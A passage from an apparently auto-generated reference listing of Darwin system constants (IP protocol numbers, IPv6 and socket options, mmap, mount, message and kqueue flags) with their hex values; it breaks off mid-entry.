IPPROTO_ENCAP (line 687) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 688) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 689) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 690) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 691) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 692) | IPPROTO_GGP = 0x3 constant IPPROTO_GMTP (line 693) | IPPROTO_GMTP = 0x64 constant IPPROTO_GRE (line 694) | IPPROTO_GRE = 0x2f constant IPPROTO_HELLO (line 695) | IPPROTO_HELLO = 0x3f constant IPPROTO_HMP (line 696) | IPPROTO_HMP = 0x14 constant IPPROTO_HOPOPTS (line 697) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 698) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 699) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 700) | IPPROTO_IDP = 0x16 constant IPPROTO_IDPR (line 701) | IPPROTO_IDPR = 0x23 constant IPPROTO_IDRP (line 702) | IPPROTO_IDRP = 0x2d constant IPPROTO_IGMP (line 703) | IPPROTO_IGMP = 0x2 constant IPPROTO_IGP (line 704) | IPPROTO_IGP = 0x55 constant IPPROTO_IGRP (line 705) | IPPROTO_IGRP = 0x58 constant IPPROTO_IL (line 706) | IPPROTO_IL = 0x28 constant IPPROTO_INLSP (line 707) | IPPROTO_INLSP = 0x34 constant IPPROTO_INP (line 708) | IPPROTO_INP = 0x20 constant IPPROTO_IP (line 709) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 710) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPCV (line 711) | IPPROTO_IPCV = 0x47 constant IPPROTO_IPEIP (line 712) | IPPROTO_IPEIP = 0x5e constant IPPROTO_IPIP (line 713) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPPC (line 714) | IPPROTO_IPPC = 0x43 constant IPPROTO_IPV4 (line 715) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 716) | IPPROTO_IPV6 = 0x29 constant IPPROTO_IRTP (line 717) | IPPROTO_IRTP = 0x1c constant IPPROTO_KRYPTOLAN (line 718) | IPPROTO_KRYPTOLAN = 0x41 constant IPPROTO_LARP (line 719) | IPPROTO_LARP = 0x5b constant IPPROTO_LEAF1 (line 720) | IPPROTO_LEAF1 = 0x19 constant IPPROTO_LEAF2 (line 721) | IPPROTO_LEAF2 = 0x1a constant IPPROTO_MAX (line 722) | IPPROTO_MAX = 0x100 constant IPPROTO_MAXID (line 723) | IPPROTO_MAXID = 0x34 constant IPPROTO_MEAS (line 724) | IPPROTO_MEAS = 0x13 constant IPPROTO_MHRP (line 725) | IPPROTO_MHRP = 0x30 constant IPPROTO_MICP (line 726) | IPPROTO_MICP = 0x5f constant IPPROTO_MTP (line 727) | IPPROTO_MTP = 0x5c constant IPPROTO_MUX (line 728) | IPPROTO_MUX = 0x12 constant IPPROTO_ND (line 729) | IPPROTO_ND = 0x4d constant IPPROTO_NHRP (line 730) | IPPROTO_NHRP = 0x36 constant IPPROTO_NONE (line 731) | IPPROTO_NONE = 0x3b constant IPPROTO_NSP (line 732) | IPPROTO_NSP = 0x1f constant IPPROTO_NVPII (line 733) | IPPROTO_NVPII = 0xb constant IPPROTO_OSPFIGP (line 734) | IPPROTO_OSPFIGP = 0x59 constant IPPROTO_PGM (line 735) | IPPROTO_PGM = 0x71 constant IPPROTO_PIGP (line 736) | IPPROTO_PIGP = 0x9 constant IPPROTO_PIM (line 737) | IPPROTO_PIM = 0x67 constant IPPROTO_PRM (line 738) | IPPROTO_PRM = 0x15 constant IPPROTO_PUP (line 739) | IPPROTO_PUP = 0xc constant IPPROTO_PVP (line 740) | IPPROTO_PVP = 0x4b constant IPPROTO_RAW (line 741) | IPPROTO_RAW = 0xff constant IPPROTO_RCCMON (line 742) | IPPROTO_RCCMON = 0xa constant IPPROTO_RDP (line 743) | IPPROTO_RDP = 0x1b constant IPPROTO_ROUTING (line 744) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 745) | IPPROTO_RSVP = 0x2e constant IPPROTO_RVD (line 746) | IPPROTO_RVD = 0x42 constant IPPROTO_SATEXPAK (line 747) | IPPROTO_SATEXPAK = 0x40 constant IPPROTO_SATMON (line 748) | IPPROTO_SATMON = 0x45 constant IPPROTO_SCCSP (line 749) | IPPROTO_SCCSP = 0x60 constant IPPROTO_SCTP (line 750) | IPPROTO_SCTP = 0x84 constant IPPROTO_SDRP (line 751) | IPPROTO_SDRP = 0x2a constant IPPROTO_SEP (line 752) | IPPROTO_SEP = 0x21 constant IPPROTO_SRPC (line 753) | IPPROTO_SRPC = 0x5a constant IPPROTO_ST (line 754) | IPPROTO_ST = 0x7 constant IPPROTO_SVMTP (line 755) | IPPROTO_SVMTP = 0x52 constant IPPROTO_SWIPE (line 756) | IPPROTO_SWIPE = 0x35 constant IPPROTO_TCF (line 757) | IPPROTO_TCF = 0x57 constant IPPROTO_TCP (line 758) | IPPROTO_TCP = 0x6 constant IPPROTO_TP (line 759) | IPPROTO_TP = 0x1d constant IPPROTO_TPXX (line 760) | IPPROTO_TPXX = 0x27 constant IPPROTO_TRUNK1 (line 761) | IPPROTO_TRUNK1 = 0x17 constant IPPROTO_TRUNK2 (line 762) | IPPROTO_TRUNK2 = 0x18 constant IPPROTO_TTP (line 763) | IPPROTO_TTP = 0x54 constant IPPROTO_UDP (line 764) | IPPROTO_UDP = 0x11 constant IPPROTO_VINES (line 765) | IPPROTO_VINES = 0x53 constant IPPROTO_VISA (line 766) | IPPROTO_VISA = 0x46 constant IPPROTO_VMTP (line 767) | IPPROTO_VMTP = 0x51 constant IPPROTO_WBEXPAK (line 768) | IPPROTO_WBEXPAK = 0x4f constant IPPROTO_WBMON (line 769) | IPPROTO_WBMON = 0x4e constant IPPROTO_WSN (line 770) | IPPROTO_WSN = 0x4a constant IPPROTO_XNET (line 771) | IPPROTO_XNET = 0xf constant IPPROTO_XTP (line 772) | IPPROTO_XTP = 0x24 constant IPV6_2292DSTOPTS (line 773) | IPV6_2292DSTOPTS = 0x17 constant IPV6_2292HOPLIMIT (line 774) | IPV6_2292HOPLIMIT = 0x14 constant IPV6_2292HOPOPTS (line 775) | IPV6_2292HOPOPTS = 0x16 constant IPV6_2292NEXTHOP (line 776) | IPV6_2292NEXTHOP = 0x15 constant IPV6_2292PKTINFO (line 777) | IPV6_2292PKTINFO = 0x13 constant IPV6_2292PKTOPTIONS (line 778) | IPV6_2292PKTOPTIONS = 0x19 constant IPV6_2292RTHDR (line 779) | IPV6_2292RTHDR = 0x18 constant IPV6_3542DSTOPTS (line 780) | IPV6_3542DSTOPTS = 0x32 constant IPV6_3542HOPLIMIT (line 781) | IPV6_3542HOPLIMIT = 0x2f constant IPV6_3542HOPOPTS (line 782) | IPV6_3542HOPOPTS = 0x31 constant IPV6_3542NEXTHOP (line 783) | IPV6_3542NEXTHOP = 0x30 constant IPV6_3542PKTINFO (line 784) | IPV6_3542PKTINFO = 0x2e constant IPV6_3542RTHDR (line 785) | IPV6_3542RTHDR = 0x33 constant IPV6_ADDR_MC_FLAGS_PREFIX (line 786) | IPV6_ADDR_MC_FLAGS_PREFIX = 0x20 constant IPV6_ADDR_MC_FLAGS_TRANSIENT (line 787) | IPV6_ADDR_MC_FLAGS_TRANSIENT = 0x10 constant IPV6_ADDR_MC_FLAGS_UNICAST_BASED (line 788) | IPV6_ADDR_MC_FLAGS_UNICAST_BASED = 0x30 constant IPV6_AUTOFLOWLABEL (line 789) | IPV6_AUTOFLOWLABEL = 0x3b constant IPV6_BINDV6ONLY (line 790) | IPV6_BINDV6ONLY = 0x1b constant IPV6_BOUND_IF (line 791) | IPV6_BOUND_IF = 0x7d constant IPV6_CHECKSUM (line 792) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 793) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 794) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 795) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 796) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 797) | IPV6_DSTOPTS = 0x32 constant IPV6_FAITH (line 798) | IPV6_FAITH = 0x1d constant IPV6_FLOWINFO_MASK (line 799) | IPV6_FLOWINFO_MASK = 0xffffff0f constant IPV6_FLOWLABEL_MASK (line 800) | IPV6_FLOWLABEL_MASK = 0xffff0f00 constant IPV6_FLOW_ECN_MASK (line 801) | IPV6_FLOW_ECN_MASK = 0x3000 constant IPV6_FRAGTTL (line 802) | IPV6_FRAGTTL = 0x3c constant IPV6_FW_ADD (line 803) | IPV6_FW_ADD = 0x1e constant IPV6_FW_DEL (line 804) | IPV6_FW_DEL = 0x1f constant IPV6_FW_FLUSH (line 805) | IPV6_FW_FLUSH = 0x20 constant IPV6_FW_GET (line 806) | IPV6_FW_GET = 0x22 constant IPV6_FW_ZERO (line 807) | IPV6_FW_ZERO = 0x21 constant IPV6_HLIMDEC (line 808) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 809) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 810) | IPV6_HOPOPTS = 0x31 constant IPV6_IPSEC_POLICY (line 811) | IPV6_IPSEC_POLICY = 0x1c constant IPV6_JOIN_GROUP (line 812) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 813) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 814) | IPV6_MAXHLIM = 0xff constant IPV6_MAXOPTHDR (line 815) | IPV6_MAXOPTHDR = 0x800 constant IPV6_MAXPACKET (line 816) | IPV6_MAXPACKET = 0xffff constant IPV6_MAX_GROUP_SRC_FILTER (line 817) | IPV6_MAX_GROUP_SRC_FILTER = 0x200 constant IPV6_MAX_MEMBERSHIPS (line 818) | IPV6_MAX_MEMBERSHIPS = 0xfff constant IPV6_MAX_SOCK_SRC_FILTER (line 819) | IPV6_MAX_SOCK_SRC_FILTER = 0x80 constant IPV6_MIN_MEMBERSHIPS (line 820) | IPV6_MIN_MEMBERSHIPS = 0x1f constant IPV6_MMTU (line 821) | IPV6_MMTU = 0x500 constant IPV6_MSFILTER (line 822) | IPV6_MSFILTER = 0x4a constant IPV6_MULTICAST_HOPS (line 823) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 824) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 825) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 826) | IPV6_NEXTHOP = 0x30 constant IPV6_PATHMTU (line 827) | IPV6_PATHMTU = 0x2c constant IPV6_PKTINFO (line 828) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 829) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 830) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 831) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 832) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_PREFER_TEMPADDR (line 833) | IPV6_PREFER_TEMPADDR = 0x3f constant IPV6_RECVDSTOPTS (line 834) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVHOPLIMIT (line 835) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 836) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVPATHMTU (line 837) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 838) | IPV6_RECVPKTINFO = 0x3d constant IPV6_RECVRTHDR (line 839) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 840) | IPV6_RECVTCLASS = 0x23 constant IPV6_RTHDR (line 841) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 842) | IPV6_RTHDRDSTOPTS = 0x39 constant IPV6_RTHDR_LOOSE (line 843) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 844) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 845) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 846) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 847) | IPV6_TCLASS = 0x24 constant IPV6_UNICAST_HOPS (line 848) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 849) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 850) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 851) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 852) | IPV6_VERSION_MASK = 0xf0 constant IP_ADD_MEMBERSHIP (line 853) | IP_ADD_MEMBERSHIP = 0xc constant IP_ADD_SOURCE_MEMBERSHIP (line 854) | IP_ADD_SOURCE_MEMBERSHIP = 0x46 constant IP_BLOCK_SOURCE (line 855) | IP_BLOCK_SOURCE = 0x48 constant IP_BOUND_IF (line 856) | IP_BOUND_IF = 0x19 constant IP_DEFAULT_MULTICAST_LOOP (line 857) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 858) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 859) | IP_DF = 0x4000 constant IP_DONTFRAG (line 860) | IP_DONTFRAG = 0x1c constant IP_DROP_MEMBERSHIP (line 861) | IP_DROP_MEMBERSHIP = 0xd constant IP_DROP_SOURCE_MEMBERSHIP (line 862) | IP_DROP_SOURCE_MEMBERSHIP = 0x47 constant IP_DUMMYNET_CONFIGURE (line 863) | IP_DUMMYNET_CONFIGURE = 0x3c constant IP_DUMMYNET_DEL (line 864) | IP_DUMMYNET_DEL = 0x3d constant IP_DUMMYNET_FLUSH (line 865) | IP_DUMMYNET_FLUSH = 0x3e constant IP_DUMMYNET_GET (line 866) | IP_DUMMYNET_GET = 0x40 constant IP_FAITH (line 867) | IP_FAITH = 0x16 constant IP_FW_ADD (line 868) | IP_FW_ADD = 0x28 constant IP_FW_DEL (line 869) | IP_FW_DEL = 0x29 constant IP_FW_FLUSH (line 870) | IP_FW_FLUSH = 0x2a constant IP_FW_GET (line 871) | IP_FW_GET = 0x2c constant IP_FW_RESETLOG (line 872) | IP_FW_RESETLOG = 0x2d constant IP_FW_ZERO (line 873) | IP_FW_ZERO = 0x2b constant IP_HDRINCL (line 874) | IP_HDRINCL = 0x2 constant IP_IPSEC_POLICY (line 875) | IP_IPSEC_POLICY = 0x15 constant IP_MAXPACKET (line 876) | IP_MAXPACKET = 0xffff constant IP_MAX_GROUP_SRC_FILTER (line 877) | IP_MAX_GROUP_SRC_FILTER = 0x200 constant IP_MAX_MEMBERSHIPS (line 878) | IP_MAX_MEMBERSHIPS = 0xfff constant IP_MAX_SOCK_MUTE_FILTER (line 879) | IP_MAX_SOCK_MUTE_FILTER = 0x80 constant IP_MAX_SOCK_SRC_FILTER (line 880) | IP_MAX_SOCK_SRC_FILTER = 0x80 constant IP_MF (line 881) | IP_MF = 0x2000 constant IP_MIN_MEMBERSHIPS (line 882) | IP_MIN_MEMBERSHIPS = 0x1f constant IP_MSFILTER (line 883) | IP_MSFILTER = 0x4a constant IP_MSS (line 884) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 885) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_IFINDEX (line 886) | IP_MULTICAST_IFINDEX = 0x42 constant IP_MULTICAST_LOOP (line 887) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 888) | IP_MULTICAST_TTL = 0xa constant IP_MULTICAST_VIF (line 889) | IP_MULTICAST_VIF = 0xe constant IP_NAT__XXX (line 890) | IP_NAT__XXX = 0x37 constant IP_OFFMASK (line 891) | IP_OFFMASK = 0x1fff constant IP_OLD_FW_ADD (line 892) | IP_OLD_FW_ADD = 0x32 constant IP_OLD_FW_DEL (line 893) | IP_OLD_FW_DEL = 0x33 constant IP_OLD_FW_FLUSH (line 894) | IP_OLD_FW_FLUSH = 0x34 constant IP_OLD_FW_GET (line 895) | IP_OLD_FW_GET = 0x36 constant IP_OLD_FW_RESETLOG (line 896) | IP_OLD_FW_RESETLOG = 0x38 constant IP_OLD_FW_ZERO (line 897) | IP_OLD_FW_ZERO = 0x35 constant IP_OPTIONS (line 898) | IP_OPTIONS = 0x1 constant IP_PKTINFO (line 899) | IP_PKTINFO = 0x1a constant IP_PORTRANGE (line 900) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 901) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 902) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 903) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 904) | IP_RECVDSTADDR = 0x7 constant IP_RECVIF (line 905) | IP_RECVIF = 0x14 constant IP_RECVOPTS (line 906) | IP_RECVOPTS = 0x5 constant IP_RECVPKTINFO (line 907) | IP_RECVPKTINFO = 0x1a constant IP_RECVRETOPTS (line 908) | IP_RECVRETOPTS = 0x6 constant IP_RECVTOS (line 909) | IP_RECVTOS = 0x1b constant IP_RECVTTL (line 910) | IP_RECVTTL = 0x18 constant IP_RETOPTS (line 911) | IP_RETOPTS = 0x8 constant IP_RF (line 912) | IP_RF = 0x8000 constant IP_RSVP_OFF (line 913) | IP_RSVP_OFF = 0x10 constant IP_RSVP_ON (line 914) | IP_RSVP_ON = 0xf constant IP_RSVP_VIF_OFF (line 915) | IP_RSVP_VIF_OFF = 0x12 constant IP_RSVP_VIF_ON (line 916) | IP_RSVP_VIF_ON = 0x11 constant IP_STRIPHDR (line 917) | IP_STRIPHDR = 0x17 constant IP_TOS (line 918) | IP_TOS = 0x3 constant IP_TRAFFIC_MGT_BACKGROUND (line 919) | IP_TRAFFIC_MGT_BACKGROUND = 0x41 constant IP_TTL (line 920) | IP_TTL = 0x4 constant IP_UNBLOCK_SOURCE (line 921) | IP_UNBLOCK_SOURCE = 0x49 constant ISIG (line 922) | ISIG = 0x80 constant ISTRIP (line 923) | ISTRIP = 0x20 constant IUTF8 (line 924) | IUTF8 = 0x4000 constant IXANY (line 925) | IXANY = 0x800 constant IXOFF (line 926) | IXOFF = 0x400 constant IXON (line 927) | IXON = 0x200 constant KERN_HOSTNAME (line 928) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 929) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 930) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 931) | KERN_VERSION = 0x4 constant LOCAL_PEERCRED (line 932) | LOCAL_PEERCRED = 0x1 constant LOCAL_PEEREPID (line 933) | LOCAL_PEEREPID = 0x3 constant LOCAL_PEEREUUID (line 934) | LOCAL_PEEREUUID = 0x5 constant LOCAL_PEERPID (line 935) | LOCAL_PEERPID = 0x2 constant LOCAL_PEERTOKEN (line 936) | LOCAL_PEERTOKEN = 0x6 constant LOCAL_PEERUUID (line 937) | LOCAL_PEERUUID = 0x4 constant LOCK_EX (line 938) | LOCK_EX = 0x2 constant LOCK_NB (line 939) | LOCK_NB = 0x4 constant LOCK_SH (line 940) | LOCK_SH = 0x1 constant LOCK_UN (line 941) | LOCK_UN = 0x8 constant MADV_CAN_REUSE (line 942) | MADV_CAN_REUSE = 0x9 constant MADV_DONTNEED (line 943) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 944) | MADV_FREE = 0x5 constant MADV_FREE_REUSABLE (line 945) | MADV_FREE_REUSABLE = 0x7 constant MADV_FREE_REUSE (line 946) | MADV_FREE_REUSE = 0x8 constant MADV_NORMAL (line 947) | MADV_NORMAL = 0x0 constant MADV_PAGEOUT (line 948) | MADV_PAGEOUT = 0xa constant MADV_RANDOM (line 949) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 950) | MADV_SEQUENTIAL = 0x2 constant MADV_WILLNEED (line 951) | MADV_WILLNEED = 0x3 constant MADV_ZERO_WIRED_PAGES (line 952) | MADV_ZERO_WIRED_PAGES = 0x6 constant MAP_32BIT (line 953) | MAP_32BIT = 0x8000 constant MAP_ANON (line 954) | MAP_ANON = 0x1000 constant MAP_ANONYMOUS (line 955) | MAP_ANONYMOUS = 0x1000 constant MAP_COPY (line 956) | MAP_COPY = 0x2 constant MAP_FILE (line 957) | MAP_FILE = 0x0 constant MAP_FIXED (line 958) | MAP_FIXED = 0x10 constant MAP_HASSEMAPHORE (line 959) | MAP_HASSEMAPHORE = 0x200 constant MAP_JIT (line 960) | MAP_JIT = 0x800 constant MAP_NOCACHE (line 961) | MAP_NOCACHE = 0x400 constant MAP_NOEXTEND (line 962) | MAP_NOEXTEND = 0x100 constant MAP_NORESERVE (line 963) | MAP_NORESERVE = 0x40 constant MAP_PRIVATE (line 964) | MAP_PRIVATE = 0x2 constant MAP_RENAME (line 965) | MAP_RENAME = 0x20 constant MAP_RESERVED0080 (line 966) | MAP_RESERVED0080 = 0x80 constant MAP_RESILIENT_CODESIGN (line 967) | MAP_RESILIENT_CODESIGN = 0x2000 constant MAP_RESILIENT_MEDIA (line 968) | MAP_RESILIENT_MEDIA = 0x4000 constant MAP_SHARED (line 969) | MAP_SHARED = 0x1 constant MAP_TRANSLATED_ALLOW_EXECUTE (line 970) | MAP_TRANSLATED_ALLOW_EXECUTE = 0x20000 constant MAP_UNIX03 (line 971) | MAP_UNIX03 = 0x40000 constant MCAST_BLOCK_SOURCE (line 972) | MCAST_BLOCK_SOURCE = 0x54 constant MCAST_EXCLUDE (line 973) | MCAST_EXCLUDE = 0x2 constant MCAST_INCLUDE (line 974) | MCAST_INCLUDE = 0x1 constant MCAST_JOIN_GROUP (line 975) | MCAST_JOIN_GROUP = 0x50 constant MCAST_JOIN_SOURCE_GROUP (line 976) | MCAST_JOIN_SOURCE_GROUP = 0x52 constant MCAST_LEAVE_GROUP (line 977) | MCAST_LEAVE_GROUP = 0x51 constant MCAST_LEAVE_SOURCE_GROUP (line 978) | MCAST_LEAVE_SOURCE_GROUP = 0x53 constant MCAST_UNBLOCK_SOURCE (line 979) | MCAST_UNBLOCK_SOURCE = 0x55 constant MCAST_UNDEFINED (line 980) | MCAST_UNDEFINED = 0x0 constant MCL_CURRENT (line 981) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 982) | MCL_FUTURE = 0x2 constant MNT_ASYNC (line 983) | MNT_ASYNC = 0x40 constant MNT_AUTOMOUNTED (line 984) | MNT_AUTOMOUNTED = 0x400000 constant MNT_CMDFLAGS (line 985) | MNT_CMDFLAGS = 0xf0000 constant MNT_CPROTECT (line 986) | MNT_CPROTECT = 0x80 constant MNT_DEFWRITE (line 987) | MNT_DEFWRITE = 0x2000000 constant MNT_DONTBROWSE (line 988) | MNT_DONTBROWSE = 0x100000 constant MNT_DOVOLFS (line 989) | MNT_DOVOLFS = 0x8000 constant MNT_DWAIT (line 990) | MNT_DWAIT = 0x4 constant MNT_EXPORTED (line 991) | MNT_EXPORTED = 0x100 constant MNT_EXT_ROOT_DATA_VOL (line 992) | MNT_EXT_ROOT_DATA_VOL = 0x1 constant MNT_FORCE (line 993) | MNT_FORCE = 0x80000 constant MNT_IGNORE_OWNERSHIP (line 994) | MNT_IGNORE_OWNERSHIP = 0x200000 constant MNT_JOURNALED (line 995) | MNT_JOURNALED = 0x800000 constant MNT_LOCAL (line 996) | MNT_LOCAL = 0x1000 constant MNT_MULTILABEL (line 997) | MNT_MULTILABEL = 0x4000000 constant MNT_NOATIME (line 998) | MNT_NOATIME = 0x10000000 constant MNT_NOBLOCK (line 999) | MNT_NOBLOCK = 0x20000 constant MNT_NODEV (line 1000) | MNT_NODEV = 0x10 constant MNT_NOEXEC (line 1001) | MNT_NOEXEC = 0x4 constant MNT_NOSUID (line 1002) | MNT_NOSUID = 0x8 constant MNT_NOUSERXATTR (line 1003) | MNT_NOUSERXATTR = 0x1000000 constant MNT_NOWAIT (line 1004) | MNT_NOWAIT = 0x2 constant MNT_QUARANTINE (line 1005) | MNT_QUARANTINE = 0x400 constant MNT_QUOTA (line 1006) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1007) | MNT_RDONLY = 0x1 constant MNT_RELOAD (line 1008) | MNT_RELOAD = 0x40000 constant MNT_REMOVABLE (line 1009) | MNT_REMOVABLE = 0x200 constant MNT_ROOTFS (line 1010) | MNT_ROOTFS = 0x4000 constant MNT_SNAPSHOT (line 1011) | MNT_SNAPSHOT = 0x40000000 constant MNT_STRICTATIME (line 1012) | MNT_STRICTATIME = 0x80000000 constant MNT_SYNCHRONOUS (line 1013) | MNT_SYNCHRONOUS = 0x2 constant MNT_UNION (line 1014) | MNT_UNION = 0x20 constant MNT_UNKNOWNPERMISSIONS (line 1015) | MNT_UNKNOWNPERMISSIONS = 0x200000 constant MNT_UPDATE (line 1016) | MNT_UPDATE = 0x10000 constant MNT_VISFLAGMASK (line 1017) | MNT_VISFLAGMASK = 0xd7f0f7ff constant MNT_WAIT (line 1018) | MNT_WAIT = 0x1 constant MSG_CTRUNC (line 1019) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1020) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1021) | MSG_DONTWAIT = 0x80 constant MSG_EOF (line 1022) | MSG_EOF = 0x100 constant MSG_EOR (line 1023) | MSG_EOR = 0x8 constant MSG_FLUSH (line 1024) | MSG_FLUSH = 0x400 constant MSG_HAVEMORE (line 1025) | MSG_HAVEMORE = 0x2000 constant MSG_HOLD (line 1026) | MSG_HOLD = 0x800 constant MSG_NEEDSA (line 1027) | MSG_NEEDSA = 0x10000 constant MSG_NOSIGNAL (line 1028) | MSG_NOSIGNAL = 0x80000 constant MSG_OOB (line 1029) | MSG_OOB = 0x1 constant MSG_PEEK (line 1030) | MSG_PEEK = 0x2 constant MSG_RCVMORE (line 1031) | MSG_RCVMORE = 0x4000 constant MSG_SEND (line 1032) | MSG_SEND = 0x1000 constant MSG_TRUNC (line 1033) | MSG_TRUNC = 0x10 constant MSG_WAITALL (line 1034) | MSG_WAITALL = 0x40 constant MSG_WAITSTREAM (line 1035) | MSG_WAITSTREAM = 0x200 constant MS_ASYNC (line 1036) | MS_ASYNC = 0x1 constant MS_DEACTIVATE (line 1037) | MS_DEACTIVATE = 0x8 constant MS_INVALIDATE (line 1038) | MS_INVALIDATE = 0x2 constant MS_KILLPAGES (line 1039) | MS_KILLPAGES = 0x4 constant MS_SYNC (line 1040) | MS_SYNC = 0x10 constant NAME_MAX (line 1041) | NAME_MAX = 0xff constant NET_RT_DUMP (line 1042) | NET_RT_DUMP = 0x1 constant NET_RT_DUMP2 (line 1043) | NET_RT_DUMP2 = 0x7 constant NET_RT_FLAGS (line 1044) | NET_RT_FLAGS = 0x2 constant NET_RT_FLAGS_PRIV (line 1045) | NET_RT_FLAGS_PRIV = 0xa constant NET_RT_IFLIST (line 1046) | NET_RT_IFLIST = 0x3 constant NET_RT_IFLIST2 (line 1047) | NET_RT_IFLIST2 = 0x6 constant NET_RT_MAXID (line 1048) | NET_RT_MAXID = 0xb constant NET_RT_STAT (line 1049) | NET_RT_STAT = 0x4 constant NET_RT_TRASH (line 1050) | NET_RT_TRASH = 0x5 constant NFDBITS (line 1051) | NFDBITS = 0x20 constant NL0 (line 1052) | NL0 = 0x0 constant NL1 (line 1053) | NL1 = 0x100 constant NL2 (line 1054) | NL2 = 0x200 constant NL3 (line 1055) | NL3 = 0x300 constant NLDLY (line 1056) | NLDLY = 0x300 constant NOFLSH (line 1057) | NOFLSH = 0x80000000 constant NOKERNINFO (line 1058) | NOKERNINFO = 0x2000000 constant NOTE_ABSOLUTE (line 1059) | NOTE_ABSOLUTE = 0x8 constant NOTE_ATTRIB (line 1060) | NOTE_ATTRIB = 0x8 constant NOTE_BACKGROUND (line 1061) | NOTE_BACKGROUND = 0x40 constant NOTE_CHILD (line 1062) | NOTE_CHILD = 0x4 constant NOTE_CRITICAL (line 1063) | NOTE_CRITICAL = 0x20 constant NOTE_DELETE (line 1064) | NOTE_DELETE = 0x1 constant NOTE_EXEC (line 1065) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1066) | NOTE_EXIT = 0x80000000 constant NOTE_EXITSTATUS (line 1067) | NOTE_EXITSTATUS = 0x4000000 constant NOTE_EXIT_CSERROR (line 1068) | NOTE_EXIT_CSERROR = 0x40000 constant NOTE_EXIT_DECRYPTFAIL (line 1069) | NOTE_EXIT_DECRYPTFAIL = 0x10000 constant NOTE_EXIT_DETAIL (line 1070) | NOTE_EXIT_DETAIL = 0x2000000 constant NOTE_EXIT_DETAIL_MASK (line 1071) | NOTE_EXIT_DETAIL_MASK = 0x70000 constant NOTE_EXIT_MEMORY (line 1072) | NOTE_EXIT_MEMORY = 0x20000 constant NOTE_EXIT_REPARENTED (line 1073) | NOTE_EXIT_REPARENTED = 0x80000 constant NOTE_EXTEND (line 1074) | NOTE_EXTEND = 0x4 constant NOTE_FFAND (line 1075) | NOTE_FFAND = 0x40000000 constant NOTE_FFCOPY (line 1076) | NOTE_FFCOPY = 0xc0000000 constant NOTE_FFCTRLMASK (line 1077) | NOTE_FFCTRLMASK = 0xc0000000 constant NOTE_FFLAGSMASK (line 1078) | NOTE_FFLAGSMASK = 0xffffff constant NOTE_FFNOP (line 1079) | NOTE_FFNOP = 0x0 constant NOTE_FFOR (line 1080) | NOTE_FFOR = 